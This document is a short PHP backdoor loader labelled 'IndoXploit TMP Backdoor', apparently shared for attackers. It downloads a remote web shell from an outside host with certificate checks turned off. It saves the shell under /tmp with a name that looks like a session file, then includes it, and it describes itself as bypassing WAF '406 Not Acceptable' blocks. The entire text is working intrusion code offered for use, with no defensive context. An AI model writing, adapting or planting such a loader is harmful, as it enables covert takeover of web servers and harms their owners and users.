TMP SHELL [Bypass 406 & Auto Delete Shell]

1. <?php
2. # IndoXploit TMP Backdoor
3. # Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell)
4. # Coded by: L0c4lh34rtz - IndoXploit
5.  
6. $data = ['https://www.indoxploit.or.id/repository/indoxploit_v3.txt', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'];
7.  
8. if(file_exists($data[1]) && filesize($data[1]) !== 0) {
9.     include($data[1]);
10. } else {
11.     $fopen = fopen($data[1], 'w+');
12.     fwrite($fopen, get($data[0]));
13.     fclose($fopen);
14.     echo '<script>window.location="?indoxploit";</script>';
15. }
16.  
17. function get($url) {
18.     $ch = curl_init();
19.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
20.           curl_setopt($ch, CURLOPT_URL, $url);
21.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
22.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
23.     return curl_exec($ch);
24.           curl_close($ch);
25. }
26. ?>